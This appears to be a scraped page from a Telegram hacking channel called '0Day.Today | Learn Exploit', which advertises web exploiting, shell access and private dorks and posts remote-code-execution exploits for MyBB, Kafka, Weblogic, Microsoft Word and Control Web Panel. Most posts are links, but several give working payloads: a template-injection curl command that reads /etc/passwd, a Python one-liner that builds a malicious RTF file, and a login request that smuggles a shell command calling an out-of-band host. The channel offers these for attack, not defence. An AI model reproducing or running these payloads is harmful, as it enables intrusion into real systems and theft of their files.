0Day.Today | Learn Exploit | Zero World | Dark web |
19.2K subscribers
1.23K photos
127 videos
489 files
1.28K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE)

Github

#LFI #RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
👍4👌3🫡2
CVE-2023-25194 - Apache Kafka 3.4.0 Rce

Github

#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
👍4
SSTI to RCE:

curl -X POST http://test.com:8080 -H "Cookie: token=eyJhbGciOiJI5cCI6Ikp.eyJ1c2VybmFtZSI6IndpemFyZC5vn0.YuW5qoU_-3FQ6q5wyFPw3PFlDHDOjuu2k" --data "name=name&desc={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}"

#SSTI #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥5👍1
Weblogic CVE-2023-21839 RCE

Github

#CVE #RCE
——————⁧
0Day.Today
@LearnExploit
@Tech_Army
👍3🔥1🍾1
CVE-2023-21716(Microsoft Word RCE vuln) Python PoC

open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))

#CVE #RCE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
4👎1
CVE-2023-25135: Pre-authentication RCE

Github

#CVE #RCE #Exploit
——————‌
0Day.Today
@LearnExploit
@Tech_Army
🔥5
CVE-2023-28311 ( Microsoft Word Remote Code Execution Vulnerability )

Github

#CVE #Windows #RCE
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍5👎1
CVE-2022-44877

Control Web Panel Unauth
RCE

POC usage:


POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}whoami.{{interactsh-url}}) HTTP/1.1
Host: vuln
Content-Type: application/x-www-form-urlencoded

username=root&password=toor&commit=Login

#Cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
👍71